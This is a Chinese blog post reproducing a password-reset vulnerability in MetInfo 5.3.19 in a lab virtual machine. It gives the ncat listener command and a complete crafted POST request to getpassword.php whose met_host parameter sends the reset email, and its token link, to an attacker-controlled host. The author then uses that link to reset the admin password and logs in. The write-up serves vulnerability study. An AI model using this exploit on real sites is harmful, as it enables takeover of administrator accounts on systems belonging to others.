metinfo 5.3.19密码重置漏洞

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/caiqiiqi/article/details/83105928

安装完成之后,即便之前已经将各目录设置为777了,到这一步时,也会将confg/config_db.php设置为只读。
在这里插入图片描述
查看改文件,发现确实是刚修改的。
在这里插入图片描述

步骤

先在一台metinfo服务器能访问的机器上设置监听80端口,如果metinfo能访问公网则可以设置公网服务器的IP,这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。

C:\Users\caiqiqi>ncat -lvv 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

在burp中构造如下请求:

POST /admin/admin/getpassword.php?met_host=192.168.96.1 HTTP/1.1
Host: 192.168.96.129
Content-Length: 93
Cache-Control: max-age=0
Origin: http://192.168.96.129
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3580.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.96.129/admin/admin/getpassword.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bdshare_firstime=1537607377172; PHPSESSID=88ff446fa200097801dbc105bd91fb27; page_iframe_url=http://192.168.96.129/index.php?lang=cn&pageset=1; re_url=http%3A%2F%2F192.168.96.129%2Fadmin%2F
Connection: close

action=next2&abt_type=2&admin_mobile=77caikiki%40gmail.com&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5

然后回返回这样。
在这里插入图片描述
然后在宿主机上的ncat可以看到传来的流量:
在这里插入图片描述
向我指定的met_host192.168.96.1passwordmail.php发送了POST请求。
在这里插入图片描述
其中有一个a标签,里面是重置密码邮件中用于重置密码的url:

http://192.168.96.129/admin/admi
n/getpassword.php?p=3ddePPh60cYObk8%2Bvjaggw%2BaoSYNrzFyO1%2FD7FeDSJ9S0F3PTxziVm
oLko8TrDQ0k0hD%2F65ytaW78BoqDXx2WbM

访问这个链接得到:
在这里插入图片描述
即可重置为任意密码。
使用新的密码成功登陆。
在这里插入图片描述

参考

https://blog.csdn.net/sinat_28757329/article/details/78868499

猜你喜欢

转载自blog.csdn.net/caiqiiqi/article/details/83105928